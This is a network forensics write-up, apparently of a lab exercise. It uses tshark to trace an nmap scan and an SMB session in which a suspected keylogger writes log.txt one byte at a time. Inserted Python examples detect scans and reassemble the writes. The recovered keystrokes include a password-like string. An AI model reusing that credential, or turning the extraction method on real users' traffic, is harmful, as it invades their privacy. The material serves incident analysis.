<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2000 1 60 bytes 1 60 bytes 2 120 bytes 2.033376000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3986 1 60 bytes 1 60 bytes 2 120 bytes 2.033584000 0.0001</span>
<span style="color: white;">10.240.240.5:44895 <-> 10.240.240.4:49156 1 60 bytes 1 60 bytes 2 120 bytes 3.114845000 0.0001</span>
<span style="color: white;">10.240.240.5:44895 <-> 10.240.240.4:2121 1 60 bytes 1 60 bytes 2 120 bytes 3.114957000 0.0000</span>
<span style="color: white;">10.240.240.5:63129 <-> 10.240.240.4:135 1 60 bytes 1 74 bytes 2 134 bytes 15.014570000 0.0001</span>
<span style="color: white;">10.240.240.5:63130 <-> 10.240.240.4:135 1 60 bytes 1 74 bytes 2 134 bytes 15.049537000 0.0003</span>
<span style="color: white;">10.240.240.5:63131 <-> 10.240.240.4:135 1 60 bytes 1 74 bytes 2 134 bytes 15.086134000 0.0001</span>
<span style="color: white;">10.240.240.5:63132 <-> 10.240.240.4:7 1 60 bytes 1 74 bytes 2 134 bytes 15.124352000 0.0003</span>
<span style="color: white;">10.240.240.5:63133 <-> 10.240.240.4:7 1 60 bytes 1 74 bytes 2 134 bytes 15.156202000 0.0002</span>
<span style="color: white;">10.240.240.5:63134 <-> 10.240.240.4:7 1 60 bytes 1 74 bytes 2 134 bytes 15.189820000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2121 0 0 bytes 1 60 bytes 1 60 bytes 1.996564000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49156 0 0 bytes 1 60 bytes 1 60 bytes 1.996745000 0.0000</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div>If we look above, we see a number of records with a frame count of 1 and a byte count of 60: a single probe packet and a single reply, with no data exchanged. We can also see that this scanning activity is originating from the host at 10.240.240.5. This correlates with the findings of the logs (see the log analysis section) on <i>NEWMAN-PC (10.240.240.5)</i>, where <i>nmap.exe</i> was run.</div><div><br /></div><div>From above, the sessions of immediate importance are:</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.240.240.4:49674 <-> 10.240.240.5:445 360 63 kB 466 67 kB 826 130 kB 76.244037000 542.9534</span>
<span style="color: white;">10.240.240.5:49704 <-> 10.240.240.4:5985 378 338 kB 390 221 kB 768 559 kB 182.473326000 429.0919</span>
<span style="color: white;">10.240.240.5:49706 <-> 10.240.240.4:5985 216 128 kB 479 418 kB 695 547 kB 182.937975000 444.0836</span>
<span style="color: white;">10.240.240.5:49705 <-> 10.240.240.4:5985 182 110 kB 402 356 kB 584 467 kB 182.860278000 428.7639</span>
</pre></div>
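<div><br /></div><div>The "frame count of 1, 60 bytes" pattern picked out by eye above can be flagged automatically from the same <i>tshark -z conv,tcp</i> table. This is an added example, not code from the original post: the sample table is constructed to match tshark's layout (a subset of the rows above), and the thresholds are assumptions to tune per environment.</div>

```python
"""Flag port-scan-like activity in the output of `tshark -q -r <pcap> -z conv,tcp`.

Added example, not code from the original post. SAMPLE_CONV_TCP is constructed
to match the column layout tshark prints (a subset of the 129 rows shown above).
"""
from collections import defaultdict

SAMPLE_CONV_TCP = """\
================================================================================
TCP Conversations
Filter:<No Filter>
 | <- | | -> | | Total | Relative | Duration |
 | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.240.240.4:49674 <-> 10.240.240.5:445 360 63 kB 466 67 kB 826 130 kB 76.244037000 542.9534
10.240.240.5:49704 <-> 10.240.240.4:5985 378 338 kB 390 221 kB 768 559 kB 182.473326000 429.0919
10.240.240.5:49682 <-> 10.240.240.4:135 4 264 bytes 5 468 bytes 9 732 bytes 9.194943000 0.0060
10.240.240.5:44893 <-> 10.240.240.4:135 1 60 bytes 2 120 bytes 3 180 bytes 1.986875000 0.0003
10.240.240.5:44893 <-> 10.240.240.4:445 1 60 bytes 2 120 bytes 3 180 bytes 1.989021000 0.0002
10.240.240.5:44893 <-> 10.240.240.4:25 1 60 bytes 1 60 bytes 2 120 bytes 1.985584000 0.0001
10.240.240.5:44893 <-> 10.240.240.4:80 1 60 bytes 1 60 bytes 2 120 bytes 1.986099000 0.0000
10.240.240.5:44893 <-> 10.240.240.4:22 1 60 bytes 1 60 bytes 2 120 bytes 1.990917000 0.0001
10.240.240.5:44893 <-> 10.240.240.4:3389 1 60 bytes 1 60 bytes 2 120 bytes 1.989684000 0.0000
10.240.240.5:44895 <-> 10.240.240.4:2121 1 60 bytes 1 60 bytes 2 120 bytes 3.114957000 0.0000
10.240.240.5:44893 <-> 10.240.240.4:2121 0 0 bytes 1 60 bytes 1 60 bytes 1.996564000 0.0000
================================================================================
"""

# Byte-count units tshark uses in this table.
UNIT = {"bytes": 1, "kB": 1000, "MB": 1000_000, "GB": 1000_000_000}


def parse_conv_tcp(text):
    """Return one dict per conversation row; header and separator lines are skipped.

    Row layout: A <-> B, frames/bytes B->A, frames/bytes A->B, total frames/bytes,
    relative start, duration. Every byte field is "<number> <unit>", so a data row
    always splits into exactly 14 tokens.
    """
    rows = []
    for line in text.splitlines():
        t = line.split()
        if len(t) != 14 or t[1] != "<->":
            continue
        a_ip, a_port = t[0].rsplit(":", 1)
        b_ip, b_port = t[2].rsplit(":", 1)
        rows.append({
            "src": a_ip, "sport": int(a_port),      # A is the side that opened it
            "dst": b_ip, "dport": int(b_port),
            "frames": int(t[9]),                     # total frames both ways
            "bytes": int(float(t[10].replace(",", "")) * UNIT[t[11]]),
            "start": float(t[12]),
            "duration": float(t[13]),
        })
    return rows


def find_probe_sources(rows, max_frames=3, min_ports=5):
    """Report originators that touched many distinct ports on one target with
    conversations too short to have carried data (SYN, reply, RST at most).

    max_frames and min_ports are assumed thresholds, not values from the post.
    """
    by_src = defaultdict(lambda: defaultdict(lambda: {"ports": set(), "sports": set()}))
    for r in rows:
        if r["frames"] > max_frames:
            continue  # a real session, not a bare probe
        entry = by_src[r["src"]][r["dst"]]
        entry["ports"].add(r["dport"])
        entry["sports"].add(r["sport"])

    findings = []
    for src, targets in by_src.items():
        for dst, e in targets.items():
            if len(e["ports"]) >= min_ports:
                findings.append({
                    "scanner": src,
                    "target": dst,
                    "ports_probed": len(e["ports"]),
                    # One source port reused across many destination ports is a
                    # useful corroborating detail when comparing with host logs.
                    "source_ports_used": len(e["sports"]),
                })
    return findings


if __name__ == "__main__":
    for f in find_probe_sources(parse_conv_tcp(SAMPLE_CONV_TCP)):
        print(f"{f['scanner']} probed {f['ports_probed']} ports on {f['target']} "
              f"from {f['source_ports_used']} source port(s)")
```

On the full 129-row table this reports 10.240.240.5 against 10.240.240.4, matching the nmap.exe finding from the host logs.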
</div><div><br /></div><div><div>Starting with session 10.240.240.4:49674 <-> 10.240.240.5:445. This communication started on July 23, 2023 at 19:11:18 local time.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y '(ip.addr== 10.240.240.4) && (tcp.port==49674) && (ip.addr==10.240.240.5) && (tcp.port==445)' -t ad</span>
<span style="color: white;"> 306 </span><span style="color: #fcff01;"><b>2023-07-23 19:11:18.591093</b></span><span style="color: white;"> 10.240.240.4 → 10.240.240.5 TCP 66 49674 → 445 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span>
</pre></div>
</div><div><br /></div><div><div>In UTC, the activity started at 23:11 on July 23, 2023.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y '(ip.addr== 10.240.240.4) && (tcp.port==49674) && (ip.addr==10.240.240.5) && (tcp.port==445)' -t ud | more</span>
<span><span style="color: white;"> 306 </span><b><span style="color: #fcff01;">2023-07-23 23:11:18.591093</span></b><span style="color: white;"> 10.240.240.4 → 10.240.240.5 TCP 66 49674 → 445 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM</span></span>
</pre></div>
</div><div><br /></div><div><div>The username used to set up the SMB connection was <i>Newman</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 314 2023-07-23 23:11:18.703795 10.240.240.4 → 10.240.240.5 SMB2 615 Session Setup Request, NTLMSSP_AUTH, </span><b><span style="color: #fcff01;">User: .\Newman</span></b></span>
<span style="color: white;"> 315 2023-07-23 23:11:18.707464 10.240.240.5 → 10.240.240.4 SMB2 159 Session Setup Response</span>
</pre></div>
</div><div><br /></div><div><div>Digging deeper into this session setup, we see <i>Newman</i> is logging on to <i>JERRY-PC</i> with the username <i>Newman</i>. Why is Newman logging on to JERRY-PC?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y 'frame.number==314' -V | sed '1,197d;214,$d' </span>
<span style="color: white;"> Domain name: .</span>
<span style="color: white;"> Length: 2</span>
<span style="color: white;"> Maxlen: 2</span>
<span style="color: white;"> Offset: 88</span>
<b><span style="color: #fcff01;"><span> User name: Newman</span>
</span></b><span style="color: white;"> Length: 12</span>
<span style="color: white;"> Maxlen: 12</span>
<span style="color: white;"> Offset: 90</span>
<span style="color: #fcff01;"><b><span> Host name: JERRY-PC</span>
</b></span><span style="color: white;"> Length: 16</span>
<span style="color: white;"> Maxlen: 16</span>
<span style="color: white;"> Offset: 102</span>
<span style="color: white;"> Session Key: fb1a311939e9582ea96066eae0c99946</span>
<span style="color: white;"> Length: 16</span>
<span style="color: white;"> Maxlen: 16</span>
<span style="color: white;"> Offset: 412</span>
</pre></div>
</div><div><br /></div><div><div>Stepping back to take a closer look into this frame.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y 'frame.number==314' -V | sed '1,157d;174,$d' </span>
<span><span style="color: white;"> Attribute: </span><b><span style="color: #fcff01;">NetBIOS </span></b><b><span style="color: #fcff01;">domain name: </span></b><b><span style="color: #fcff01;">NEWMAN-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: NetBIOS domain name (0x0002)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> NetBIOS Domain Name: NEWMAN-PC</span>
<span><span style="color: white;"> Attribute: </span><span style="color: #fcff01;"><b>NetBIOS computer name:</b></span><b><span style="color: #fcff01;"> NEWMAN-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: NetBIOS computer name (0x0001)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> NetBIOS Computer Name: NEWMAN-PC</span>
<span><span style="color: white;"> Attribute: </span><span style="color: #fcff01;"><b>DNS </b><b>domain name:</b> </span><b><span style="color: #fcff01;">Newman-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: DNS domain name (0x0004)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> DNS Domain Name: Newman-PC</span>
<span><span style="color: white;"> Attribute: </span><b><span style="color: #fcff01;">DNS computer name: Newman-PC</span></b></span>
<span style="color: white;"> NTLMV2 Response Item Type: DNS computer name (0x0003)</span>
<span style="color: white;"> NTLMV2 Response Item Length: 18</span>
<span style="color: white;"> DNS Computer Name: Newman-PC</span>
</pre></div>
</div><div><br /></div><div><div>Above, we see <i>NEWMAN-PC</i> for the <i>NetBIOS domain name</i>, the <i>NetBIOS computer name</i>, the <i>DNS domain name</i> and the <i>DNS computer name</i>. This suggests this computer belongs to <i>Newman</i>. Newman seems to be using his credentials to connect to <i>Jerry-PC</i>. All of this is also confirmed via the log analysis further below.</div><div><br /></div><div>When we look into frame 315 (the response to 314), we see that a <i>Session Id</i> was assigned to Newman on host <i>JERRY-PC</i>.</div><div> <!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y 'frame.number==315' -V | sed '1,106d;115,$d'</span></pre><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> </span><b><span style="color: #fcff01;">Session Id: 0x0001040000000001 Acct:Newman Domain:. Host:JERRY-PC</span></b></span>
<span style="color: white;"> [</span><span style="color: #fcff01;"><b>Account: Newman</b></span><span style="color: white;">]</span>
<span style="color: white;"> [Domain: .]</span>
<span><span style="color: white;"> [</span><b><span style="color: #fcff01;">Host: JERRY-PC</span></b><span style="color: white;">]</span></span>
<span style="color: white;"> [Authenticated in Frame: 314]</span>
<span style="color: white;"> Signature: f161357be0ca6801f8a6ab45a8a37943</span>
<span style="color: white;"> [Response to: 314]</span>
<span style="color: white;"> [Time from request: 0.003669000 seconds]</span>
</pre></div>
</div><div><br /></div><div><div>We then see a request to connect to the share <i>\\10.240.240.5\Shared</i> from <i>10.240.240.4</i>. This request was successful.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 316 2023-07-23 23:11:18.726884 10.240.240.4 → 10.240.240.5 SMB2 172 Tree Connect Request Tree: </span><span style="color: #fcff01;"><b>\\10.240.240.5\Shared</b></span>
<span style="color: white;"> 317 2023-07-23 23:11:18.728119 10.240.240.5 → 10.240.240.4 SMB2 138 Tree Connect Response</span>
</pre></div>
</div><div><br /></div><div><div>We then see a request to create a file named <i>log.txt</i>. The response indicates this request was successful.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 318 2023-07-23 23:11:18.763385 10.240.240.4 → 10.240.240.5 SMB2 192 </span><b><span style="color: #fcff01;">Create Request File: log.txt</span></b></span>
<span><span style="color: white;"> 319 2023-07-23 23:11:18.764399 10.240.240.5 → 10.240.240.4 SMB2 210 </span><b><span style="color: #fcff01;">Create Response File: log.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>After creating <i>log.txt</i>, we see 1 byte written to the file, at offset 1000.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 320 2023-07-23 23:11:18.790806 10.240.240.4 → 10.240.240.5 SMB2 171</span><b><span style="color: #fcff01;"> Write Request Len:1 Off:1000 File: log.txt</span></b></span>
<span style="color: white;"> 321 2023-07-23 23:11:18.791670 10.240.240.5 → 10.240.240.4 SMB2 138 Write Response</span>
</pre></div>
</div><div><br /></div><div><div>The file is then closed.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 322 2023-07-23 23:11:18.796259 10.240.240.4 → 10.240.240.5 SMB2 146 </span><span style="color: #fcff01;"><b>Close Request File: log.txt</b></span>
<span style="color: white;"> 323 2023-07-23 23:11:18.796697 10.240.240.5 → 10.240.240.4 SMB2 182 Close Response</span>
</pre></div>
</div><div><br /></div><div><div>This process of creating the file and writing 1 byte and closing continued until the session starts reporting Keep-Alive ack messages.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 1119 2023-07-23 23:12:21.454723 10.240.240.4 → 10.240.240.5 SMB2 192 </span><b><span style="color: #fcff01;">Create Request File: log.txt</span></b></span>
<span><span style="color: white;"> 1120 2023-07-23 23:12:21.455367 10.240.240.5 → 10.240.240.4 SMB2 210 </span><b><span style="color: #fcff01;">Create Response File: log.txt</span></b></span>
<span style="color: white;"> 1121 2023-07-23 23:12:21.456480 10.240.240.4 → 10.240.240.5 SMB2 171 </span><span style="color: #fcff01;"><b>Write Request Len:1 Off:1290 File: log.txt</b></span>
<span><span style="color: white;"> 1122 2023-07-23 23:12:21.456752 10.240.240.5 → 10.240.240.4 SMB2 138 </span><b><span style="color: #fcff01;">Write Response</span></b></span>
<span><span style="color: white;"> 1123 2023-07-23 23:12:21.457468 10.240.240.4 → 10.240.240.5 SMB2 146 </span><b><span style="color: #fcff01;">Close Request File: log.txt</span></b></span>
<span><span style="color: white;"> 1124 2023-07-23 23:12:21.457660 10.240.240.5 → 10.240.240.4 SMB2 182 </span><b><span style="color: #fcff01;">Close Response</span></b></span>
</pre></div>
</div><div><br /></div><div><div>At this point above, we see 1 byte is still written but the file is now at offset 1290. It started off at offset 1000. This means the file should now contain at least 1290-1000 = 290 bytes. My conclusion at this point is that a keylogger was in use; I see no other reason why one byte would be written at a time.</div><div><br /></div><div>Writing this session out to a file of its own.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -r 5-4.pcap -Y '(ip.addr== 10.240.240.4) && (tcp.port==49674) && (ip.addr==10.240.240.5) && (tcp.port==445)' -w 4_49674-5_445.pcap</span>
</pre></div>
</div><div><br /></div><div><div>With the new file created, confirming the share accessed and the file created in this share.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 4_49674-5_445.pcap -T fields -e smb2.tree -e smb2.filename | sort | uniq --count</span>
<span style="color: white;"> 123 </span>
<span style="color: white;"> 586 \\10.240.240.5\Shared</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">117 \\10.240.240.5\Shared log.txt</span></b></span>
</pre></div>
</div><div><br /></div><div><div>We see that there were 117 appearances of the <i>log.txt</i> file in this session. If we step back above, I stated it looks like about 290 bytes were written. However, if we look here and see this file was seen 117 times, and we know 1 byte was written each time, does this mean the file actually contains 117 bytes or somewhere near that? These are all things for us to validate during this investigation.</div><div><br /></div><div>Preparing to extract the<i> log.txt</i> files by first making a directory named "<i>extracted_content</i>" then changing to that directory to store the extracted contents.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ mkdir extracted_content && cd extracted_content</span>
</pre></div>
</div><div><br /></div><div><div>Fortunately, TShark (and Wireshark) can extract contents from protocols such as SMB.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">$ tshark.exe --export-objects --help
tshark: "--export-objects" are specified as: <protocol>,<destdir>
tshark: The available export object types for the "--export-objects" option are:
dicom
ftp-data
http
imf
smb
tftp</span>
</pre></div></div><div><br /></div></div><div>Extracting the <i>log.txt</i> files:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r ../4_49674-5_445.pcap --export-objects smb,.</span>
</pre></div>
</div><div><br /></div><div><div>Looks like 118 files were extracted. My gosh, why all of these discrepancies.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ ls -l | wc --lines</span>
<span style="color: white;">118</span>
</pre></div>
</div><div><br /></div><div><div>Taking a quick look at the files.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ ls -l *</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1265 Jul 26 10:12 '%5clog(100).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1266 Jul 26 10:12 '%5clog(101).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1267 Jul 26 10:12 '%5clog(102).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1268 Jul 26 10:12 '%5clog(103).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1279 Jul 26 10:12 '%5clog(104).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1280 Jul 26 10:12 '%5clog(105).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1281 Jul 26 10:12 '%5clog(106).txt'</span>
<span style="color: white;">-rw-r--r-- 1 kali kali 1282 Jul 26 10:12 '%5clog(107).txt'</span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Reading one of the files</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat "%5clog(100).txt"</span>
<span style="color: white;">c</span>
</pre></div>
</div><div><br /></div><div><div>As expected. One character at a time. Now, do I need to read each of these files individually to see what is in all of them? I don't intend to :-)</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat * | tr --complement --delete '[:print:]'</span>
</pre></div>
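The <code>cat *</code> above feeds the exported objects in the shell's name order, where <code>log(10)</code> sorts before <code>log(2)</code>, so the printable bytes come out in a different order from the one they were written in, and each exported object is null-padded up to its write offset. The script below is an added example, not code from the original write-up: it rebuilds the file from the SMB2 Write Requests themselves, replaying them by frame and offset, reporting the gap between written ranges, and keeping only printable bytes. Its TSV input is constructed here, and the tshark filter and field names in the comment are assumptions to verify against your build.

```python
from typing import Dict, List, Tuple

# Constructed stand-in for a tshark fields export of the SMB2 Write Requests, e.g.
#   tshark -r 4_49674-5_445.pcap -Y 'smb2.cmd == 9 && !smb2.flags.response' \
#     -T fields -e frame.number -e smb2.file_offset -e smb2.write_length -e smb2.write_data
# (the filter and field names are assumptions; confirm with `tshark -G fields | grep smb2`).
# Columns: frame, file offset, write length, data as hex (tshark prints bytes as aa:bb:cc).
# The keystrokes below are made up for the example, not the page's recovered text.
SAMPLE_TSV = "\n".join([
    "320\t1000\t1\t50",                          # 'P'
    "326\t1001\t1\t61",                          # 'a'
    "332\t1002\t1\t73",                          # 's'
    "338\t1003\t1\t73",                          # 's'
    "344\t1004\t1\t77",                          # 'w'
    "350\t1005\t1\t6f",                          # 'o'
    "356\t1006\t1\t72",                          # 'r'
    "362\t1007\t1\t64",                          # 'd'
    "368\t1008\t9\t4b:65:79:2e:73:68:69:66:74",  # 'Key.shift', a multi-byte write
    "1121\t1290\t1\t31",                         # '1' after a range the capture never covers
])

WriteRecord = Tuple[int, int, bytes]  # (frame number, file offset, data)

def parse_write_records(tsv: str) -> List[WriteRecord]:
    """Parse 'frame<TAB>offset<TAB>length<TAB>hexdata' lines into write records."""
    records: List[WriteRecord] = []
    for line in tsv.splitlines():
        if not line.strip():
            continue
        frame, offset, length, hexdata = line.split("\t")
        data = bytes.fromhex(hexdata.replace(":", ""))
        if len(data) != int(length):  # a Write Request's Len must match its payload
            raise ValueError(f"frame {frame}: declared length {length}, got {len(data)} bytes")
        records.append((int(frame), int(offset), data))
    return records

def reassemble(records: List[WriteRecord], fill: bytes = b"\x00") -> bytes:
    """Replay the writes at their offsets in frame (wire) order.
    Offsets never written are filled with `fill`, which matches the page's exported
    objects of 1,265+ bytes that show a single visible character each."""
    buf = bytearray()
    for _frame, offset, data in sorted(records):
        end = offset + len(data)
        if end > len(buf):
            buf.extend(fill * (end - len(buf)))
        buf[offset:end] = data  # a later write to the same offset wins, as on the server
    return bytes(buf)

def write_summary(records: List[WriteRecord]) -> Dict[str, object]:
    """Bytes actually written versus the offset span, plus the gaps between written
    ranges: the two numbers the page juggles (write count vs. file size on disk)."""
    merged: List[Tuple[int, int]] = []
    for start, end in sorted((off, off + len(d)) for _f, off, d in records):
        if merged and start <= merged[-1][1]:
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    if not merged:
        return {"bytes_written": 0, "first_offset": None, "end_offset": None, "gaps": []}
    return {
        "bytes_written": sum(len(d) for _f, _o, d in records),
        "first_offset": merged[0][0],
        "end_offset": merged[-1][1],
        "gaps": [(a[1], b[0]) for a, b in zip(merged, merged[1:])],
    }

def printable_text(blob: bytes) -> str:
    """Keep only printable ASCII, like `tr --complement --delete '[:print:]'`."""
    return "".join(chr(b) for b in blob if 32 <= b < 127)

if __name__ == "__main__":
    recs = parse_write_records(SAMPLE_TSV)
    print(write_summary(recs))
    print(printable_text(reassemble(recs)))
```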
</div><div><br /></div><div><div>The above command produced an output with many characters that did not seem to make sense. However, identifying the items that matter, we see</div></div><div><br /></div><div><div>"<b><i>cure Key.shift Passwmord1337an</i></b>" and "<i>weird acoming fronm you ...skql</i>". Not sure what these mean right now. </div><div><br /></div><div>However, back to the packet analysis of another session.</div><div><br /></div><div>10.240.240.5:49704 <-> 10.240.240.4:5985</div><div><br /></div><div>Writing this session out to a file</div></div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-4.pcap -Y '(ip.addr==10.240.240.5) && (tcp.port==49704) && (ip.addr==10.240.240.4) && (tcp.port==5985)' -w 5_49704-4_5985.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>Glancing at the protocol hierarchy. This allows me to get a quick overview of what I may be able to expect in these packets.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5_49704-4_5985.pcapng -q -z io,phs </span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:768 bytes:559854</span>
<span style="color: white;"> ip frames:768 bytes:559854</span>
<span style="color: white;"> tcp frames:768 bytes:559854</span>
<span style="color: white;"> http frames:190 bytes:79651</span>
<span style="color: white;"> xml frames:190 bytes:79651</span>
